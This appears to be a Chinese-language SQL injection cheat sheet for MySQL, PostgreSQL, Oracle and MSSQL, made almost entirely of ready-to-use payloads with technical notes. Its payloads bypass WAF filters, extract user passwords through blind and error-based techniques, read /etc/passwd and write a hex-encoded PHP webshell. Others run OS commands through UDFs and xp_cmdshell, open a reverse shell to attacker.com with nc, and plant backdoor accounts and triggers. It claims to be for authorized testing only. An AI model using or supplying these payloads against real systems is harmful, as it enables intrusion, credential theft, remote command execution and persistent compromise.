中高级SQL注入语句

中高级SQL注入语句（说明：除 PostgreSQL / Oracle / MSSQL 小节外，以下语句均针对 MySQL；多数语句依赖具体数据库版本、当前账户权限以及驱动是否允许堆叠查询，各条说明中已标注限制条件。另外 MySQL 中 `--` 注释必须后跟空格或换行才生效，实际发送时应写成 `-- `、`--+`（URL 中）或改用 `#`。本页内容仅限授权测试使用。）

一、绕过WAF/过滤

' UNiON/**/SeLeCT/**/1,2,3--

用内联注释 /**/ 代替空格以绕过空格过滤，同时对关键字做大小写混写以绕过区分大小写的黑名单。注意末尾的 `--` 在 MySQL 中需后跟空格才是注释，URL 场景下写成 `--+` 或改用 `#`。


' AND/**/1=0/**/UNION/**/SELECT/**/1,2,3--

`AND 1=0` 使原查询不返回任何行，这样 UNION 带入的数据会直接出现在回显位置；/**/ 仍用于替代空格，可与大小写混写组合以绕过关键字黑名单。


'/*!50000UNION*//*!50000SELECT*/1,2,3--

`/*!50000UNION*/` 是 MySQL 条件注释：服务器版本不低于 5.00.00 时注释内容会被当作 SQL 执行，其他数据库和多数 WAF 则把它视为普通注释而忽略。版本号可调整，但必须不大于目标 MySQL 的实际版本，否则内容被跳过。


' AND~1+1=2--

用无空格的位运算/算术表达式代替 `1=1` 之类的固定特征以绕过过滤。注意 MySQL 中 `~` 按无符号 64 位取反，`~1+1` 的结果是 18446744073709551615 而不是 2，所以这条实际是"假"条件，可作为布尔盲注的否定探针，与恒真写法（如 `~0&1=1`）配对使用；请先在目标版本上验证真假值。


' XOR (SELECT 1 FROM (SELECT SLEEP(5))a)--

时间盲注：派生表中的 SLEEP(5) 无论 XOR 结果如何都会执行，响应延迟约 5 秒即说明语句被执行；XOR 只是用来替代被过滤的 AND/OR 连接词。派生表必须带别名（此处为 a），否则 MySQL 报错。


二、高级盲注技术

' AND (SELECT MID(@@version,1,1)='5')--

使用 MID 函数逐字符判断 @@version（MySQL 8 的首字符为 '8'，不再是 '5'）；MID、SUBSTR、SUBSTRING 在 MySQL 中等价，其中一个被过滤时可互换。


' AND (SELECT ORD(MID((SELECT password FROM users LIMIT 1),1,1)))>50--

用 ORD（与 ASCII 等价，可互换绕过）取出单个字符的编码值后与数字比较，配合二分查找每个字符约需 7 次请求；`LIMIT 1` 取第一行，换行用 `LIMIT n,1`。多字节字符时 ORD 返回的是整个多字节编码值，需改用 HEX 或按字节处理。


' AND (SELECT BIN(ASCII(SUBSTR((SELECT password FROM users LIMIT 1),1,1)))&1)--

按位盲注（每个字符 8 次请求，无需二分）。注意 BIN() 返回的是由 '0'/'1' 组成的字符串，与 1 做位运算时 MySQL 会先把它按十进制数隐式转换，只有最低位的结果恰好正确，其他位不能这样取；更稳妥的写法是直接对数值操作，如 `ASCII(...)>>k&1` 逐位提取。


' AND (SELECT POSITION('a' IN (SELECT password FROM users LIMIT 1)))>0--

用 POSITION（等价于 LOCATE）判断子串是否出现；把 `>0` 改为 `=n` 可进一步确定位置。默认排序规则下比较不区分大小写，需要精确匹配时改用 `POSITION('a' IN BINARY(...))`。


' AND (SELECT CHAR_LENGTH((SELECT password FROM users LIMIT 1)))>5--

先用二分确定字段长度，再逐字符猜解，可减少无效请求。CHAR_LENGTH 返回字符数，LENGTH 返回字节数，多字节编码下两者不同，按字节猜解时应与 LENGTH 配合。


三、非常规报错注入

' AND GTID_SUBSET(CONCAT(0x7e,(SELECT password FROM users LIMIT 1),0x7e),1)--

MySQL GTID 函数报错注入，需 MySQL ≥ 5.6：参数不是合法 GTID 集合时报错 "Malformed GTID set specification" 并回显参数内容，0x7e（`~`）用作定界符便于从错误信息中截取数据。子查询必须只返回一行，否则报 "Subquery returns more than 1 row" 而非泄露数据。


' AND ST_LatFromGeoHash((SELECT database()))--

地理空间函数报错注入，需 MySQL ≥ 5.7：传入的值不是合法 geohash 时报错并在错误信息中回显该值；参数需为字符串，数值型数据请先用 CONCAT 包装。


' AND NAME_CONST((SELECT password FROM users LIMIT 1),1)--

NAME_CONST 要求两个参数都是常量；传入子查询时通常只会得到 "Incorrect arguments to NAME_CONST"，错误信息中不包含数据，因此这条写法本身一般无法泄露数据。可用的形式是以 version()、@@datadir 等常量表达式作为列名并利用重复列名报错（见下一条）。


' AND (SELECT 1 FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1))x)--

派生表 x 中出现两列同名时 MySQL 报 "Duplicate column name '...'"，列名即 version() 的值，从而回显版本。只适用于 NAME_CONST 接受的常量表达式，不能把 version() 直接换成子查询。


' AND EXP(~(SELECT*FROM(SELECT USER())a))--

指数函数溢出报错：`~` 对子查询结果取反得到极大数值，EXP() 溢出后报 "DOUBLE value is out of range in 'exp(~(...))'"，错误信息中带出子查询内容。该回显行为只存在于较早的 MySQL 5.5.x 版本，5.7 及以后的错误信息不再包含表达式，需先确认目标版本。


四、堆叠查询高级利用

'; SET @sql=0x73656c6563742031; PREPARE stmt FROM @sql; EXECUTE stmt;--

十六进制编码的预处理语句：0x73656c6563742031 解码为 `select 1`，因为要执行的语句以十六进制字面量出现，可以绕过对 SELECT 等关键字的过滤。本节所有语句都要求注入点支持堆叠查询（如 PHP 的 mysqli_multi_query、连接时启用 CLIENT_MULTI_STATEMENTS），多数默认配置的 MySQL 驱动并不支持。


'; DELIMITER //; CREATE PROCEDURE test() BEGIN SELECT 1; END//; CALL test()//--

创建存储过程执行。注意 `DELIMITER` 是 mysql 命令行客户端的指令，不是服务端 SQL，通过注入点发送会直接语法错误；应去掉 DELIMITER，使用单语句体（如 `CREATE PROCEDURE test() SELECT 1; CALL test();`），并需要 CREATE ROUTINE 权限。


'; HANDLER users OPEN; HANDLER users READ FIRST; HANDLER users CLOSE;--

使用 HANDLER 命令逐行读取表，可绕过对 SELECT 关键字的过滤，但仍需要对该表的 SELECT 权限；读取结果只有在应用回显堆叠查询结果集时才可见，否则需改为写入临时表或配合盲注。


'; CREATE TEMPORARY TABLE temp AS SELECT * FROM users; SELECT * FROM temp;--

创建临时表中转数据，需要 CREATE TEMPORARY TABLES 权限。临时表只在当前连接内可见，应用使用连接池时后续请求可能拿到不同连接而看不到该表，因此读取最好放在同一次堆叠查询中完成。


'; LOCK TABLES users READ; UNLOCK TABLES;--

表锁定操作。这条语句加锁后立即释放，本身没有实际效果；若去掉 UNLOCK 并保持连接，会阻塞其他会话对 users 的写入，造成拒绝服务。需要 LOCK TABLES 和 SELECT 权限，属破坏性操作，授权测试中应避免或仅在得到明确许可时使用。


五、数据库特定高级技巧

MySQL

' UNION SELECT 1,(SELECT(@)FROM(SELECT(@:=0x00),(SELECT(@)FROM(users)WHERE(@)IN(@:=CONCAT(@,0x0a,username,0x3a,password))))a),3-- 变量赋值绕过SELECT限制


' AND (SELECT * FROM (SELECT NAME_CONST((SELECT password FROM users LIMIT 1),1),NAME_CONST((SELECT password FROM users LIMIT 1),1))x)--

重复列名报错（派生表 x 中两列同名）。但这里 NAME_CONST 的第一个参数是子查询而非常量，通常只会报 "Incorrect arguments to NAME_CONST" 而不泄露数据；该技巧只对常量表达式有效，提取表数据请改用 GTID_SUBSET、UPDATEXML 等函数。


' UNION SELECT 1,LOAD_FILE(0x2f6574632f706173737764),3--

用十六进制表示文件路径以绕过引号过滤：0x2f6574632f706173737764 解码为 /etc/passwd。LOAD_FILE 需要 FILE 权限，且受 secure_file_priv 限制（为 NULL 时完全禁用）；文件必须对 mysqld 进程可读且不超过 max_allowed_packet，不满足时返回 NULL 而不报错。


' AND (SELECT BINARY(password) FROM users LIMIT 1)='admin'--

BINARY 强制按字节比较，区分大小写，避免默认排序规则不区分大小写导致的误判；子查询应保证只返回一行（此处靠 LIMIT 1）。

---

PostgreSQL

'::text UNION SELECT 1,2,3--

`::text` 是 PostgreSQL 的显式类型转换语法。PostgreSQL 对 UNION 各列的类型要求严格，不匹配会报错，可用 `::text` 把各列统一转为文本；同样的写法也能打破 WAF 对 `' UNION` 的特征匹配。


' AND (SELECT array_to_string(array_agg(column_name),',') FROM information_schema.columns) LIKE '%pass%'--

用 array_agg 把多行合并为一行再由 array_to_string 拼接，避免子查询返回多行报错，一次即可探测是否存在含 pass 的列名；加上 `WHERE table_name='users'` 可缩小范围。information_schema.columns 只列出当前角色有权限的列。


' AND (SELECT convert_from(decode('YWRtaW4=','base64'),'utf-8'))='admin'--

Base64 解码绕过：decode('YWRtaW4=','base64') 解码为 admin，可在引号或关键字被过滤时以编码形式传递字符串。decode 返回 bytea，需用 convert_from 转回文本后再比较。


' AND (SELECT has_table_privilege('users','select'))--

has_table_privilege 返回布尔值，可直接作为 AND 条件做盲注，判断当前角色对 users 是否有 SELECT 权限；表不存在时会报错，因此也可用来探测表名是否存在。类似地可查询 current_user 以及 pg_roles 中的 rolsuper 判断是否为超级用户。

---

Oracle

' AND (SELECT LISTAGG(column_name,',') WITHIN GROUP (ORDER BY column_name) FROM all_tab_columns) LIKE '%PASS%'-- LISTAGG函数数据聚合


' AND (SELECT DBMS_LOB.SUBSTR((SELECT password FROM users),1,1) FROM DUAL)='a'--

LOB 对象处理：当 password 为 CLOB 时不能直接用 = 比较，需先用 DBMS_LOB.SUBSTR 取子串，参数顺序为（LOB、长度、起始位置），此处取第 1 个字符。子查询 `(SELECT password FROM users)` 在表有多行时报 ORA-01427，应加 `WHERE ROWNUM=1`。


' AND (SELECT RAWTOHEX(UTL_RAW.CAST_TO_RAW((SELECT password FROM users))) FROM DUAL) LIKE '61%'--

RAW 类型转换：把字符串转为 RAW 再输出十六进制，可逐字节比较并绕过引号过滤；RAWTOHEX 输出大写十六进制，'61' 对应字符 'a'。子查询同样需要限定单行（`WHERE ROWNUM=1`）。


六、文件操作高级技巧

' UNION SELECT 1,LOAD_FILE('/var/www/html/config.php'),3 INTO DUMPFILE '/tmp/config.txt'--

读取并导出文件：LOAD_FILE 和 INTO DUMPFILE 都需要 FILE 权限，且 secure_file_priv 必须为空字符串（NULL 表示禁用，非空则只能写入该目录）；目标目录需对运行 mysqld 的系统用户可写，目标文件不能已存在。DUMPFILE 只写入一行原始内容，不加换行和转义，适合二进制文件。


' UNION SELECT 1,0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e,3 INTO OUTFILE '/var/www/html/shell.php'--

十六进制写入 Webshell：该十六进制串解码为 `<?php system($_GET['cmd']); ?>`，以十六进制写法避免引号和 `<?` 被过滤。前提同上（FILE 权限、secure_file_priv 允许、web 目录对 mysqld 可写，且数据库与 web 服务器在同一主机）。写入 webshell 属高风险操作，仅在授权范围内执行，并在测试结束后删除文件、记录在报告中。


' AND (SELECT COUNT(*) FROM mysql.user WHERE file_priv='Y')>0--

检查当前是否有账户拥有 FILE 权限，需要对 mysql.user 的读权限；更直接的做法是查询当前账户自身。同时应检查 `SELECT @@secure_file_priv`（NULL 表示文件读写完全禁用）以及 `@@plugin_dir`、`@@datadir`，这些决定了后续读写文件和 UDF 是否可行。


' UNION SELECT 1,hex(load_file('/etc/passwd')),3--

以十六进制格式读取文件：HEX 编码可以避免文件中的换行、二进制内容或 HTML 标签在回显时被截断或破坏，取回后再解码。文件不可读或不存在时 LOAD_FILE 返回 NULL。


七、系统命令执行

'; SELECT sys_eval('id')--

UDF 系统命令执行：前提是目标已加载 lib_mysqludf_sys（提供 sys_eval、sys_exec 等函数），并且注入点支持堆叠查询。sys_eval 返回命令的标准输出，sys_exec 只返回退出码；命令以 mysqld 进程的系统用户身份执行。


'; CREATE FUNCTION sys_exec RETURNS string SONAME 'udf.so'; SELECT sys_exec('whoami')--

创建 UDF 执行命令：udf.so 必须事先写入 `@@plugin_dir` 目录（通常需要 FILE 权限和对该目录的写权限，可用 INTO DUMPFILE 写入），并与目标 MySQL 的架构和版本匹配；CREATE FUNCTION 需要 CREATE ROUTINE 及对 mysql.func 的插入权限。同样依赖堆叠查询。


'; EXEC xp_cmdshell 'whoami'--

MSSQL 命令执行：xp_cmdshell 默认禁用，需要 sysadmin 权限并先执行 `EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;`。命令以 SQL Server 服务账户身份运行。MSSQL 默认支持堆叠查询，这是它比 MySQL 更容易利用的原因。


'; COPY (SELECT '') TO PROGRAM 'nc -e /bin/sh attacker.com 4444'--

PostgreSQL 反向 shell：`COPY ... TO PROGRAM` 需 PostgreSQL ≥ 9.3，且当前角色为超级用户或属于 pg_execute_server_program；命令以 postgres 系统用户身份执行。`nc -e` 只有部分 netcat 实现支持，不可用时可改用 `bash -i >& /dev/tcp/HOST/PORT 0>&1` 等写法。攻击机地址和端口须是授权测试中受控的主机。


八、权限提升和持久化

'; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'password'--

创建高权限用户：`GRANT ... IDENTIFIED BY` 语法在 MySQL 8.0 已移除，需先 `CREATE USER 'attacker'@'%' IDENTIFIED BY '...'` 再 GRANT；执行者需要 GRANT OPTION 及相应权限。新增持久化账户属高影响操作，应使用复杂口令、记录在报告中并在测试结束后删除。


; INSERT INTO mysql.func (name, ret, dl, type) VALUES ('sys_exec', 2, 'udf.so', 'function')--

直接向 mysql.func 插入 UDF 定义，绕过被过滤的 CREATE FUNCTION；需要对 mysql.func 的 INSERT 权限，udf.so 仍需位于 plugin_dir，插入后通常要重启或重新加载才会生效。注意本条开头缺少闭合原语句的引号 `'`，需按注入点上下文补全；需堆叠查询。


'; CREATE TRIGGER backdoor BEFORE INSERT ON users FOR EACH ROW BEGIN SELECT 1; END--

创建后门触发器，需要 TRIGGER 权限。注意 MySQL 不允许触发器返回结果集，`BEGIN SELECT 1; END` 这样的触发器体会报错（Not allowed to return a result set from a trigger），实际利用时应换成 INSERT/UPDATE 等语句，例如在插入新用户时把凭据复制到攻击者可读的表中。通过注入点发送时不能使用 DELIMITER，触发器体应保持单语句。


'; UPDATE mysql.user SET plugin='mysql_native_password' WHERE user='root'--

直接修改 mysql.user 中的认证插件，需要对 mysql 库的 UPDATE 权限（通常为 SUPER/root），且需执行 FLUSH PRIVILEGES 才生效。MySQL 8 默认使用 caching_sha2_password，只改 plugin 而不同步更新 authentication_string 会导致 root 无法登录，属破坏性操作；授权测试中应优先使用 `ALTER USER` 并提前备份原值。


九、网络操作和信息收集

' AND (SELECT SUBSTRING_INDEX(USER(),'@',-1))='localhost'--

获取连接来源主机：USER() 返回 `用户@客户端主机`，取 @ 之后的部分即应用服务器连接数据库所用的主机，可据此判断数据库与 web 服务器是否同机（影响文件写入是否可达）。注意与 CURRENT_USER() 区分，后者是授权时匹配到的账户。

' UNION SELECT 1,@@hostname,@@version_compile_os,4--

获取系统信息：UNION 的列数必须与原查询一致（此处为 4 列）；@@hostname、@@version_compile_os 之外还可一并取 @@datadir、@@basedir、@@plugin_dir、@@secure_file_priv，为后续文件操作和 UDF 做准备。

'; SELECT * FROM information_schema.PROCESSLIST--

查看当前连接进程：需要 PROCESS 权限才能看到其他用户的连接，否则只显示自己的；INFO 列包含正在执行的语句，可用于发现其他应用账户、来源主机以及可能的明文凭据。需要堆叠查询和结果回显。